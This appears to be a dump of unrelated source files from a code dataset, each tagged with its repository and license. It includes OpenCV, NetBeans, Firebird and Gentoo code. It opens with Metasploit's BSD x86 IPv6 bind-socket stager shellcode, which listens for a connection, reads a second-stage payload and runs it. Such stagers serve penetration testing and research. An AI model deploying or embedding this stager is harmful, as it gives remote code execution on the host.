push byte 28 ; Domain: (PF_INET6=28)
push byte 97
pop eax ; socket()
push eax ; padding
int 0x80
mov ebx, eax ; save socket
xor edx, edx
push edx ; uint32_t sin6_scope_id; /* scope zone index */
push edx ; struct in6_addr sin6_addr; /* IP6 address */
push edx
push edx
push edx
push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */
push dword 0xbfbf1c1c
; in_port_t sin6_port; /* Transport layer port # */
; uint8_t sin6_len; /* length of this struct */
; sa_family_t sin6_family; /* AF_INET6 */
mov ecx, esp
bind:
push byte 28
push ecx
push eax
push byte 104
pop eax
push eax ; padding
int 0x80
listen:
mov al, 106
int 0x80
accept:
push edx
push ebx
%ifndef USE_SINGLE_STAGE
mov dh, 0x10
%endif
push edx
mov al, 30
int 0x80
%ifndef USE_SINGLE_STAGE
read:
push ecx
push eax
push ecx
%ifdef FD_REG_EBX
xchg eax, ebx
%else
xchg eax, edi
%endif
push byte 0x3
pop eax
int 0x80
ret
%else
%ifdef FD_REG_EBX
xchg eax, ebx
%else
xchg eax, edi
%endif
%endif
| Assembly | 3 | OsmanDere/metasploit-framework | external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
#
mes 2,EM_WSIZE,EM_PSIZE
exp $utime
pro $utime,0
lal 0
loi 2*EM_PSIZE
loc 30
mon
zne *1
loc 0
ret EM_WSIZE
1
ste errno
loc -1
ret EM_WSIZE
end
| Eiffel | 1 | wyan/ack | plat/em/libsys/utime.e | [
"BSD-3-Clause"
] |
//! This module defines a thin abstract layer on top of the rustc's parser and syntax libraries.
pub(crate) mod parser;
pub(crate) mod session;
| Rust | 1 | mbc-git/rust | src/tools/rustfmt/src/syntux.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
//
// Int4.mm
//
// Created by Giles Payne on 2020/02/05.
//
#import "Int4.h"
#import "Mat.h"
@implementation Int4 {
cv::Vec4i native;
}
-(int)v0 {
return native[0];
}
-(void)setV0:(int)v {
native[0] = v;
}
-(int)v1 {
return native[1];
}
-(void)setV1:(int)v {
native[1] = v;
}
-(int)v2 {
return native[2];
}
-(void)setV2:(int)v {
native[2] = v;
}
-(int)v3 {
return native[3];
}
-(void)setV3:(int)v {
native[3] = v;
}
-(instancetype)init {
return [self initWithV0:0 v1:0 v2:0 v3:0];
}
-(instancetype)initWithV0:(int)v0 v1:(int)v1 v2:(int)v2 v3:(int)v3 {
self = [super init];
if (self) {
self.v0 = v0;
self.v1 = v1;
self.v2 = v2;
self.v3 = v3;
}
return self;
}
-(instancetype)initWithVals:(NSArray<NSNumber*>*)vals {
self = [super init];
if (self) {
[self set:vals];
}
return self;
}
+(instancetype)fromNative:(cv::Vec4i&)vec4i {
return [[Int4 alloc] initWithV0:vec4i[0] v1:vec4i[1] v2:vec4i[2] v3:vec4i[3]];
}
-(void)set:(NSArray<NSNumber*>*)vals {
self.v0 = (vals != nil && vals.count > 0) ? vals[0].intValue : 0;
self.v1 = (vals != nil && vals.count > 1) ? vals[1].intValue : 0;
self.v2 = (vals != nil && vals.count > 2) ? vals[2].intValue : 0;
self.v3 = (vals != nil && vals.count > 3) ? vals[3].intValue : 0;
}
-(NSArray<NSNumber*>*)get {
return @[[NSNumber numberWithFloat:native[0]], [NSNumber numberWithFloat:native[1]], [NSNumber numberWithFloat:native[2]], [NSNumber numberWithFloat:native[3]]];
}
- (BOOL)isEqual:(id)other {
if (other == self) {
return YES;
} else if (![other isKindOfClass:[Int4 class]]) {
return NO;
} else {
Int4* point = (Int4*)other;
return self.v0 == point.v0 && self.v1 == point.v1 && self.v2 == point.v2 && self.v3 == point.v3;
}
}
@end
| Objective-C++ | 3 | artun3e/opencv | modules/core/misc/objc/common/Int4.mm | [
"BSD-3-Clause"
] |
#Signature file v4.1
#Version 1.66
CLSS public java.lang.Object
cons public init()
meth protected java.lang.Object clone() throws java.lang.CloneNotSupportedException
meth protected void finalize() throws java.lang.Throwable
meth public boolean equals(java.lang.Object)
meth public final java.lang.Class<?> getClass()
meth public final void notify()
meth public final void notifyAll()
meth public final void wait() throws java.lang.InterruptedException
meth public final void wait(long) throws java.lang.InterruptedException
meth public final void wait(long,int) throws java.lang.InterruptedException
meth public int hashCode()
meth public java.lang.String toString()
CLSS public final org.netbeans.api.project.libraries.LibrariesCustomizer
meth public static boolean showCustomizer(org.netbeans.api.project.libraries.Library)
meth public static boolean showCustomizer(org.netbeans.api.project.libraries.Library,org.netbeans.api.project.libraries.LibraryManager)
meth public static boolean showSingleLibraryCustomizer(org.netbeans.api.project.libraries.Library)
meth public static org.netbeans.api.project.libraries.Library showCreateNewLibraryCustomizer(org.netbeans.api.project.libraries.LibraryManager)
supr java.lang.Object
CLSS public final org.netbeans.api.project.libraries.Library
fld public final static java.lang.String PROP_CONTENT = "content"
fld public final static java.lang.String PROP_DESCRIPTION = "description"
fld public final static java.lang.String PROP_DISPLAY_NAME = "displayName"
fld public final static java.lang.String PROP_NAME = "name"
fld public final static java.lang.String PROP_PROPERTIES = "properties"
meth public boolean equals(java.lang.Object)
meth public int hashCode()
meth public java.lang.String getDescription()
meth public java.lang.String getDisplayName()
meth public java.lang.String getName()
meth public java.lang.String getType()
meth public java.lang.String toString()
meth public java.util.List<java.net.URI> getURIContent(java.lang.String)
meth public java.util.List<java.net.URL> getContent(java.lang.String)
meth public java.util.Map<java.lang.String,java.lang.String> getProperties()
anno 0 org.netbeans.api.annotations.common.NonNull()
meth public org.netbeans.api.project.libraries.LibraryManager getManager()
meth public void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public void removePropertyChangeListener(java.beans.PropertyChangeListener)
supr java.lang.Object
hfds LOG,impl,listener,listeners,manager
CLSS public final org.netbeans.api.project.libraries.LibraryChooser
innr public abstract interface static Filter
innr public abstract interface static LibraryImportHandler
innr public abstract interface static Panel
meth public static java.util.Set<org.netbeans.api.project.libraries.Library> showDialog(org.netbeans.api.project.libraries.LibraryManager,org.netbeans.api.project.libraries.LibraryChooser$Filter,org.netbeans.api.project.libraries.LibraryChooser$LibraryImportHandler)
meth public static org.netbeans.api.project.libraries.LibraryChooser$Panel createPanel(org.netbeans.api.project.libraries.LibraryManager,org.netbeans.api.project.libraries.LibraryChooser$Filter)
supr java.lang.Object
CLSS public abstract interface static org.netbeans.api.project.libraries.LibraryChooser$Filter
outer org.netbeans.api.project.libraries.LibraryChooser
meth public abstract boolean accept(org.netbeans.api.project.libraries.Library)
CLSS public abstract interface static org.netbeans.api.project.libraries.LibraryChooser$LibraryImportHandler
outer org.netbeans.api.project.libraries.LibraryChooser
meth public abstract org.netbeans.api.project.libraries.Library importLibrary(org.netbeans.api.project.libraries.Library) throws java.io.IOException
CLSS public abstract interface static org.netbeans.api.project.libraries.LibraryChooser$Panel
outer org.netbeans.api.project.libraries.LibraryChooser
fld public final static java.lang.String PROP_SELECTED_LIBRARIES = "selectedLibraries"
meth public abstract java.awt.Component getVisualComponent()
meth public abstract java.util.Set<org.netbeans.api.project.libraries.Library> getSelectedLibraries()
meth public abstract void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract void removePropertyChangeListener(java.beans.PropertyChangeListener)
CLSS public final org.netbeans.api.project.libraries.LibraryManager
fld public final static java.lang.String PROP_LIBRARIES = "libraries"
fld public final static java.lang.String PROP_OPEN_LIBRARY_MANAGERS = "openManagers"
meth public java.lang.String getDisplayName()
meth public java.lang.String toString()
meth public java.net.URL getLocation()
meth public org.netbeans.api.project.libraries.Library createLibrary(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URL>>) throws java.io.IOException
anno 1 org.netbeans.api.annotations.common.NonNull()
anno 2 org.netbeans.api.annotations.common.NonNull()
anno 3 org.netbeans.api.annotations.common.NullAllowed()
anno 4 org.netbeans.api.annotations.common.NullAllowed()
anno 5 org.netbeans.api.annotations.common.NonNull()
meth public org.netbeans.api.project.libraries.Library createLibrary(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URL>>,java.util.Map<java.lang.String,java.lang.String>) throws java.io.IOException
anno 1 org.netbeans.api.annotations.common.NonNull()
anno 2 org.netbeans.api.annotations.common.NonNull()
anno 3 org.netbeans.api.annotations.common.NullAllowed()
anno 4 org.netbeans.api.annotations.common.NullAllowed()
anno 5 org.netbeans.api.annotations.common.NonNull()
anno 6 org.netbeans.api.annotations.common.NonNull()
meth public org.netbeans.api.project.libraries.Library createLibrary(java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URL>>) throws java.io.IOException
meth public org.netbeans.api.project.libraries.Library createURILibrary(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URI>>) throws java.io.IOException
anno 1 org.netbeans.api.annotations.common.NonNull()
anno 2 org.netbeans.api.annotations.common.NonNull()
anno 3 org.netbeans.api.annotations.common.NullAllowed()
anno 4 org.netbeans.api.annotations.common.NullAllowed()
anno 5 org.netbeans.api.annotations.common.NonNull()
meth public org.netbeans.api.project.libraries.Library createURILibrary(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URI>>,java.util.Map<java.lang.String,java.lang.String>) throws java.io.IOException
anno 1 org.netbeans.api.annotations.common.NonNull()
anno 2 org.netbeans.api.annotations.common.NonNull()
anno 3 org.netbeans.api.annotations.common.NullAllowed()
anno 4 org.netbeans.api.annotations.common.NullAllowed()
anno 5 org.netbeans.api.annotations.common.NonNull()
anno 6 org.netbeans.api.annotations.common.NonNull()
meth public org.netbeans.api.project.libraries.Library createURILibrary(java.lang.String,java.lang.String,java.util.Map<java.lang.String,java.util.List<java.net.URI>>) throws java.io.IOException
meth public org.netbeans.api.project.libraries.Library getLibrary(java.lang.String)
meth public org.netbeans.api.project.libraries.Library[] getLibraries()
meth public static java.util.Collection<org.netbeans.api.project.libraries.LibraryManager> getOpenManagers()
meth public static org.netbeans.api.project.libraries.LibraryManager forLocation(java.net.URL)
meth public static org.netbeans.api.project.libraries.LibraryManager getDefault()
meth public static void addOpenManagersPropertyChangeListener(java.beans.PropertyChangeListener)
meth public static void removeOpenManagersPropertyChangeListener(java.beans.PropertyChangeListener)
meth public void addLibrary(org.netbeans.api.project.libraries.Library) throws java.io.IOException
anno 0 java.lang.Deprecated()
meth public void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public void removeLibrary(org.netbeans.api.project.libraries.Library) throws java.io.IOException
meth public void removePropertyChangeListener(java.beans.PropertyChangeListener)
supr java.lang.Object
hfds AREAL_LIBRARY_PROVIDER_LISTENER,alp,area,areaProvidersLookupResult,cache,currentAreaProviders,currentStorages,eventId,instance,listeners,lookupListener,openLibraryManagerListListeners,plistener,result
CLSS public abstract interface org.netbeans.spi.project.libraries.ArealLibraryProvider<%0 extends org.netbeans.spi.project.libraries.LibraryStorageArea, %1 extends org.netbeans.spi.project.libraries.LibraryImplementation2>
fld public final static java.lang.String PROP_OPEN_AREAS = "openAreas"
meth public abstract java.lang.Class<{org.netbeans.spi.project.libraries.ArealLibraryProvider%0}> areaType()
meth public abstract java.lang.Class<{org.netbeans.spi.project.libraries.ArealLibraryProvider%1}> libraryType()
meth public abstract java.util.Set<{org.netbeans.spi.project.libraries.ArealLibraryProvider%0}> getOpenAreas()
meth public abstract org.netbeans.spi.project.libraries.LibraryProvider<{org.netbeans.spi.project.libraries.ArealLibraryProvider%1}> getLibraries({org.netbeans.spi.project.libraries.ArealLibraryProvider%0})
meth public abstract void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract void remove({org.netbeans.spi.project.libraries.ArealLibraryProvider%1}) throws java.io.IOException
meth public abstract void removePropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract {org.netbeans.spi.project.libraries.ArealLibraryProvider%0} createArea()
meth public abstract {org.netbeans.spi.project.libraries.ArealLibraryProvider%0} loadArea(java.net.URL)
meth public abstract {org.netbeans.spi.project.libraries.ArealLibraryProvider%1} createLibrary(java.lang.String,java.lang.String,{org.netbeans.spi.project.libraries.ArealLibraryProvider%0},java.util.Map<java.lang.String,java.util.List<java.net.URI>>) throws java.io.IOException
CLSS public org.netbeans.spi.project.libraries.LibraryCustomizerContext
cons public init(org.netbeans.spi.project.libraries.LibraryImplementation,org.netbeans.spi.project.libraries.LibraryStorageArea)
meth public org.netbeans.spi.project.libraries.LibraryImplementation getLibraryImplementation()
meth public org.netbeans.spi.project.libraries.LibraryImplementation2 getLibraryImplementation2()
meth public org.netbeans.spi.project.libraries.LibraryStorageArea getLibraryStorageArea()
supr java.lang.Object
hfds libraryImplementation,libraryStorageArea
CLSS public org.netbeans.spi.project.libraries.LibraryFactory
meth public static org.netbeans.api.project.libraries.Library createLibrary(org.netbeans.spi.project.libraries.LibraryImplementation)
supr java.lang.Object
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryImplementation
fld public final static java.lang.String PROP_CONTENT = "content"
fld public final static java.lang.String PROP_DESCRIPTION = "description"
fld public final static java.lang.String PROP_NAME = "name"
meth public abstract java.lang.String getDescription()
meth public abstract java.lang.String getLocalizingBundle()
meth public abstract java.lang.String getName()
meth public abstract java.lang.String getType()
meth public abstract java.util.List<java.net.URL> getContent(java.lang.String)
meth public abstract void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract void removePropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract void setContent(java.lang.String,java.util.List<java.net.URL>)
meth public abstract void setDescription(java.lang.String)
meth public abstract void setLocalizingBundle(java.lang.String)
meth public abstract void setName(java.lang.String)
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryImplementation2
intf org.netbeans.spi.project.libraries.LibraryImplementation
meth public abstract java.util.List<java.net.URI> getURIContent(java.lang.String)
meth public abstract void setURIContent(java.lang.String,java.util.List<java.net.URI>)
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryImplementation3
fld public final static java.lang.String PROP_PROPERTIES = "properties"
intf org.netbeans.spi.project.libraries.NamedLibraryImplementation
meth public abstract java.util.Map<java.lang.String,java.lang.String> getProperties()
anno 0 org.netbeans.api.annotations.common.NonNull()
meth public abstract void setProperties(java.util.Map<java.lang.String,java.lang.String>)
anno 1 org.netbeans.api.annotations.common.NonNull()
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryProvider<%0 extends org.netbeans.spi.project.libraries.LibraryImplementation>
fld public final static java.lang.String PROP_LIBRARIES = "libraries"
meth public abstract void addPropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract void removePropertyChangeListener(java.beans.PropertyChangeListener)
meth public abstract {org.netbeans.spi.project.libraries.LibraryProvider%0}[] getLibraries()
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryStorageArea
fld public final static org.netbeans.spi.project.libraries.LibraryStorageArea GLOBAL
meth public abstract java.lang.String getDisplayName()
meth public abstract java.net.URL getLocation()
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryStorageAreaCache
meth public abstract java.util.Collection<? extends java.net.URL> getCachedAreas()
anno 0 org.netbeans.api.annotations.common.NonNull()
CLSS public abstract interface org.netbeans.spi.project.libraries.LibraryTypeProvider
intf org.openide.util.Lookup$Provider
meth public abstract java.beans.Customizer getCustomizer(java.lang.String)
meth public abstract java.lang.String getDisplayName()
meth public abstract java.lang.String getLibraryType()
meth public abstract java.lang.String[] getSupportedVolumeTypes()
meth public abstract org.netbeans.spi.project.libraries.LibraryImplementation createLibrary()
meth public abstract void libraryCreated(org.netbeans.spi.project.libraries.LibraryImplementation)
meth public abstract void libraryDeleted(org.netbeans.spi.project.libraries.LibraryImplementation)
CLSS public abstract interface org.netbeans.spi.project.libraries.NamedLibraryImplementation
fld public final static java.lang.String PROP_DISPLAY_NAME = "displayName"
intf org.netbeans.spi.project.libraries.LibraryImplementation
meth public abstract java.lang.String getDisplayName()
anno 0 org.netbeans.api.annotations.common.CheckForNull()
meth public abstract void setDisplayName(java.lang.String)
anno 1 org.netbeans.api.annotations.common.NullAllowed()
CLSS public abstract interface org.netbeans.spi.project.libraries.WritableLibraryProvider<%0 extends org.netbeans.spi.project.libraries.LibraryImplementation>
intf org.netbeans.spi.project.libraries.LibraryProvider<{org.netbeans.spi.project.libraries.WritableLibraryProvider%0}>
meth public abstract boolean addLibrary({org.netbeans.spi.project.libraries.WritableLibraryProvider%0}) throws java.io.IOException
meth public abstract boolean removeLibrary({org.netbeans.spi.project.libraries.WritableLibraryProvider%0}) throws java.io.IOException
meth public abstract boolean updateLibrary({org.netbeans.spi.project.libraries.WritableLibraryProvider%0},{org.netbeans.spi.project.libraries.WritableLibraryProvider%0}) throws java.io.IOException
CLSS public abstract org.openide.util.Lookup
cons public init()
fld public final static org.openide.util.Lookup EMPTY
innr public abstract interface static Provider
innr public abstract static Item
innr public abstract static Result
innr public final static Template
meth public <%0 extends java.lang.Object> java.util.Collection<? extends {%%0}> lookupAll(java.lang.Class<{%%0}>)
meth public <%0 extends java.lang.Object> org.openide.util.Lookup$Item<{%%0}> lookupItem(org.openide.util.Lookup$Template<{%%0}>)
meth public <%0 extends java.lang.Object> org.openide.util.Lookup$Result<{%%0}> lookupResult(java.lang.Class<{%%0}>)
meth public abstract <%0 extends java.lang.Object> org.openide.util.Lookup$Result<{%%0}> lookup(org.openide.util.Lookup$Template<{%%0}>)
meth public abstract <%0 extends java.lang.Object> {%%0} lookup(java.lang.Class<{%%0}>)
meth public static org.openide.util.Lookup getDefault()
supr java.lang.Object
hfds LOG,defaultLookup,defaultLookupProvider
hcls DefLookup,Empty
CLSS public abstract interface static org.openide.util.Lookup$Provider
outer org.openide.util.Lookup
meth public abstract org.openide.util.Lookup getLookup()
| Standard ML | 3 | timfel/netbeans | ide/project.libraries.ui/nbproject/org-netbeans-modules-project-libraries-ui.sig | [
"Apache-2.0"
] |
alias gawkpath_default 'unsetenv AWKPATH; setenv AWKPATH `gawk -v x=AWKPATH "BEGIN {print ENVIRON[x]}"`'
alias gawkpath_prepend 'if (! $?AWKPATH) setenv AWKPATH ""; if ($AWKPATH == "") then; unsetenv AWKPATH; setenv AWKPATH `gawk -v x=AWKPATH "BEGIN {print ENVIRON[x]}"`; endif; setenv AWKPATH "\!*"":$AWKPATH"'
alias gawkpath_append 'if (! $?AWKPATH) setenv AWKPATH ""; if ($AWKPATH == "") then; unsetenv AWKPATH; setenv AWKPATH `gawk -v x=AWKPATH "BEGIN {print ENVIRON[x]}"`; endif; setenv AWKPATH "$AWKPATH"":\!*"'
alias gawklibpath_default 'unsetenv AWKLIBPATH; setenv AWKLIBPATH `gawk -v x=AWKLIBPATH "BEGIN {print ENVIRON[x]}"`'
alias gawklibpath_prepend 'if (! $?AWKLIBPATH) setenv AWKLIBPATH ""; if ($AWKLIBPATH == "") then; unsetenv AWKLIBPATH; setenv AWKLIBPATH `gawk -v x=AWKLIBPATH "BEGIN {print ENVIRON[x]}"`; endif; setenv AWKLIBPATH "\!*"":$AWKLIBPATH"'
alias gawklibpath_append 'if (! $?AWKLIBPATH) setenv AWKLIBPATH ""; if ($AWKLIBPATH == "") then; unsetenv AWKLIBPATH; setenv AWKLIBPATH `gawk -v x=AWKLIBPATH "BEGIN {print ENVIRON[x]}"`; endif; setenv AWKLIBPATH "$AWKLIBPATH"":\!*"'
| Tcsh | 3 | Bhuvanesh1208/ruby2.6.1 | msys64/usr/etc/profile.d/gawk.csh | [
"Ruby"
] |
/**
* fannkuch.pike by Robert Brandner
* heavily based on the Java JDK-client version by Paul Lofte
*/
int main(int argc, array(string) argv) {
int n = (int)argv[1];
write("Pfannkuchen(" + n + ") = " + fannkuch(n)+"\n");
}
int fannkuch(int n) {
int check = 0;
array(int) perm = allocate(n);
array(int) perm1 = allocate(n);
array(int) count = allocate(n);
array(int) maxPerm = allocate(n);
int maxFlipsCount = 0;
int m = n - 1;
for (int i = 0; i < n; i++) perm1[i] = i;
int r = n;
while (1) {
// write-out the first 30 permutations
if (check < 30){
for(int i=0; i<n; i++) write((string)(perm1[i]+1));
write("\n");
check++;
}
while (r != 1) { count[r - 1] = r; r--; }
if (!(perm1[0] == 0 || perm1[m] == m)) {
for (int i = 0; i < n; i++) perm[i] = perm1[i];
int flipsCount = 0;
int k;
while (!((k = perm[0]) == 0)) {
int k2 = (k + 1) >> 1;
for (int i = 0; i < k2; i++) {
int temp = perm[i]; perm[i] = perm[k - i]; perm[k - i] = temp;
}
flipsCount++;
}
if (flipsCount > maxFlipsCount) {
maxFlipsCount = flipsCount;
for (int i = 0; i < n; i++) maxPerm[i] = perm1[i];
}
}
while (1) {
if (r == n) return maxFlipsCount;
int perm0 = perm1[0];
int i = 0;
while (i < r) {
int j = i + 1;
perm1[i] = perm1[j];
i = j;
}
perm1[r] = perm0;
count[r] = count[r] - 1;
if (count[r] > 0) break;
r++;
}
}
}
| Pike | 4 | kragen/shootout | bench/fannkuch/fannkuch.pike | [
"BSD-3-Clause"
] |
<?xml version='1.0' encoding='UTF-8'?>
<Project Type="Project" LVVersion="12008004">
<Property Name="NI.LV.All.SourceOnly" Type="Bool">true</Property>
<Property Name="NI.Project.Description" Type="Str"></Property>
<Item Name="My Computer" Type="My Computer">
<Property Name="server.app.propertiesEnabled" Type="Bool">true</Property>
<Property Name="server.control.propertiesEnabled" Type="Bool">true</Property>
<Property Name="server.tcp.enabled" Type="Bool">false</Property>
<Property Name="server.tcp.port" Type="Int">0</Property>
<Property Name="server.tcp.serviceName" Type="Str">My Computer/VI Server</Property>
<Property Name="server.tcp.serviceName.default" Type="Str">My Computer/VI Server</Property>
<Property Name="server.vi.callsEnabled" Type="Bool">true</Property>
<Property Name="server.vi.propertiesEnabled" Type="Bool">true</Property>
<Property Name="specify.custom.address" Type="Bool">false</Property>
<Item Name="Get Project LV Version.vi" Type="VI" URL="../Get Project LV Version.vi"/>
<Item Name="Dependencies" Type="Dependencies">
<Item Name="vi.lib" Type="Folder">
<Item Name="Recursive File List.vi" Type="VI" URL="/<vilib>/Utility/libraryn.llb/Recursive File List.vi"/>
</Item>
<Item Name="msvcrt.dll" Type="Document" URL="msvcrt.dll">
<Property Name="NI.PreserveRelativePath" Type="Bool">true</Property>
</Item>
</Item>
<Item Name="Build Specifications" Type="Build">
<Item Name="My Application" Type="EXE">
<Property Name="App_INI_aliasGUID" Type="Str">{5928282F-930E-40D3-BCD0-5D4DAE7D6098}</Property>
<Property Name="App_INI_GUID" Type="Str">{81E49E9C-6526-4233-B540-1D0516915E5A}</Property>
<Property Name="Bld_buildCacheID" Type="Str">{91283138-01D6-4E80-88C2-2847C15365C6}</Property>
<Property Name="Bld_buildSpecName" Type="Str">My Application</Property>
<Property Name="Bld_excludeInlineSubVIs" Type="Bool">true</Property>
<Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property>
<Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property>
<Property Name="Bld_localDestDir" Type="Path">..</Property>
<Property Name="Bld_localDestDirType" Type="Str">relativeToProject</Property>
<Property Name="Bld_modifyLibraryFile" Type="Bool">true</Property>
<Property Name="Bld_previewCacheID" Type="Str">{397D4143-EA6F-497F-8C83-E2A0CBDE7FED}</Property>
<Property Name="Destination[0].destName" Type="Str">GetProjVersion.exe</Property>
<Property Name="Destination[0].path" Type="Path">../GetProjVersion.exe</Property>
<Property Name="Destination[0].path.type" Type="Str">relativeToProject</Property>
<Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property>
<Property Name="Destination[0].type" Type="Str">App</Property>
<Property Name="Destination[1].destName" Type="Str">Support Directory</Property>
<Property Name="Destination[1].path" Type="Path">../data</Property>
<Property Name="Destination[1].path.type" Type="Str">relativeToProject</Property>
<Property Name="DestinationCount" Type="Int">2</Property>
<Property Name="Source[0].itemID" Type="Str">{19C241C8-BF26-4A92-97DA-330467AEE0BE}</Property>
<Property Name="Source[0].type" Type="Str">Container</Property>
<Property Name="Source[1].destinationIndex" Type="Int">0</Property>
<Property Name="Source[1].itemID" Type="Ref">/My Computer/Get Project LV Version.vi</Property>
<Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property>
<Property Name="Source[1].type" Type="Str">VI</Property>
<Property Name="SourceCount" Type="Int">2</Property>
<Property Name="TgtF_companyName" Type="Str">NI</Property>
<Property Name="TgtF_fileDescription" Type="Str">My Application</Property>
<Property Name="TgtF_fileVersion.major" Type="Int">1</Property>
<Property Name="TgtF_internalName" Type="Str">My Application</Property>
<Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2013 NI</Property>
<Property Name="TgtF_productName" Type="Str">My Application</Property>
<Property Name="TgtF_targetfileGUID" Type="Str">{B635F5E8-3BC2-4F81-9778-0E2D9F5315B0}</Property>
<Property Name="TgtF_targetfileName" Type="Str">GetProjVersion.exe</Property>
</Item>
</Item>
</Item>
</Project>
| LabVIEW | 1 | TBDFramework/Jenkins-Autobuild | Get Project LV Version/Get Project LV Version.lvproj | [
"BSD-2-Clause"
] |
sleep 1
t app appmode photo
sleep 600
t app button shutter PR
d:\autoexec.ash
REBOOT yes
| AGS Script | 0 | waltersgrey/autoexechack | MegaLapse/10MinInterval/Hero3PlusBlack/autoexec.ash | [
"MIT"
] |
package com.baeldung.openid.oidc.login;
import org.junit.jupiter.api.Test;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.test.context.ContextConfiguration;
import com.baeldung.openid.oidc.utils.YamlLoaderInitializer;
@SpringBootTest(classes = SpringOidcLoginApplication.class, properties = "custom.configyaml.file=login-application.yml")
@ContextConfiguration(initializers = YamlLoaderInitializer.class)
public class SpringContextTest {
@Test
public void whenSpringContextIsBootstrapped_thenNoExceptions() {
}
}
| Java | 3 | DBatOWL/tutorials | spring-security-modules/spring-security-oidc/src/test/java/com/baeldung/openid/oidc/login/SpringContextTest.java | [
"MIT"
] |
/*
* Program type: Embedded Dynamic SQL
*
* Description:
* This program creates a new database, using a static SQL string.
* The newly created database is accessed after its creation,
* and a sample table is added.
* The contents of this file are subject to the Interbase Public
* License Version 1.0 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy
* of the License at http://www.Inprise.com/IPL.html
*
* Software distributed under the License is distributed on an
* "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express
* or implied. See the License for the specific language governing
* rights and limitations under the License.
*
* The Original Code was created by Inprise Corporation
* and its predecessors. Portions created by Inprise Corporation are
* Copyright (C) Inprise Corporation.
*
* All Rights Reserved.
* Contributor(s): ______________________________________.
*/
#include "example.h"
#include <stdlib.h>
#include <string.h>
void pr_error (char *operation);
char *new_dbname = "new.fdb";
char *create_tbl = "CREATE TABLE dbinfo (when_created DATE)";
char *insert_date = "INSERT INTO dbinfo VALUES ('NOW')";
/*
* Declare a database handle, which will be used by the new database.
*/
EXEC SQL
SET DATABASE db = COMPILETIME "employee.fdb";
int main(int argc, char** argv)
{
db = NULL;
/*
* Create a new database, establishing a connection
* as well.
*/
EXEC SQL
EXECUTE IMMEDIATE "CREATE DATABASE 'new.fdb'";
if (SQLCODE)
{
/* Print a descriptive message, if the database exists. */
if (SQLCODE == -902)
{
printf("\nDatabase already exists.\n");
printf("Remove %s before running this program.\n\n", new_dbname);
}
pr_error("create database");
return 1;
}
EXEC SQL
COMMIT RELEASE;
if (SQLCODE)
{
pr_error("commit & release");
return 1;
}
printf("Created database '%s'.\n\n", new_dbname);
/*
* Connect to the new database and create a sample table.
*/
/* Use the database handle declared above. */
EXEC SQL
CONNECT :new_dbname AS db;
if (SQLCODE)
{
pr_error("connect database");
return 1;
}
/* Create a sample table. */
EXEC SQL
SET TRANSACTION;
EXEC SQL
EXECUTE IMMEDIATE :create_tbl;
if (SQLCODE)
{
pr_error("create table");
return 1;
}
EXEC SQL
COMMIT RETAIN;
/* Insert 1 row into the new table. */
EXEC SQL
SET TRANSACTION;
EXEC SQL
EXECUTE IMMEDIATE :insert_date;
if (SQLCODE)
{
pr_error("insert into");
return 1;
}
EXEC SQL
COMMIT RELEASE;
printf("Successfully accessed the newly created database.\n\n");
EXEC SQL
DISCONNECT db;
return 0;
}
/*
* Print the status, the SQLCODE, and exit.
* Also, indicate which operation the error occured on.
*/
void pr_error(char* operation)
{
printf("[\n");
printf("PROBLEM ON \"%s\".\n", operation);
isc_print_status(gds__status);
printf("SQLCODE = %d\n", SQLCODE);
printf("]\n");
}
| Eiffel | 5 | AlexeyMochalov/firebird | examples/dyn/dyn1.e | [
"Condor-1.1"
] |
# Copyright 1999-2017 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# @ECLASS: estack.eclass
# @MAINTAINER:
# base-system@gentoo.org
# @BLURB: stack-like value storage support
# @DESCRIPTION:
# Support for storing values on stack-like variables.
if [[ -z ${_ESTACK_ECLASS} ]]; then
# @FUNCTION: estack_push
# @USAGE: <stack> [items to push]
# @DESCRIPTION:
# Push any number of items onto the specified stack. Pick a name that
# is a valid variable (i.e. stick to alphanumerics), and push as many
# items as you like onto the stack at once.
#
# The following code snippet will echo 5, then 4, then 3, then ...
# @CODE
# estack_push mystack 1 2 3 4 5
# while estack_pop mystack i ; do
# echo "${i}"
# done
# @CODE
estack_push() {
[[ $# -eq 0 ]] && die "estack_push: incorrect # of arguments"
local stack_name="_ESTACK_$1_" ; shift
eval ${stack_name}+=\( \"\$@\" \)
}
# @FUNCTION: estack_pop
# @USAGE: <stack> [variable]
# @DESCRIPTION:
# Pop a single item off the specified stack. If a variable is specified,
# the popped item is stored there. If no more items are available, return
# 1, else return 0. See estack_push for more info.
estack_pop() {
[[ $# -eq 0 || $# -gt 2 ]] && die "estack_pop: incorrect # of arguments"
# We use the fugly _estack_xxx var names to avoid collision with
# passing back the return value. If we used "local i" and the
# caller ran `estack_pop ... i`, we'd end up setting the local
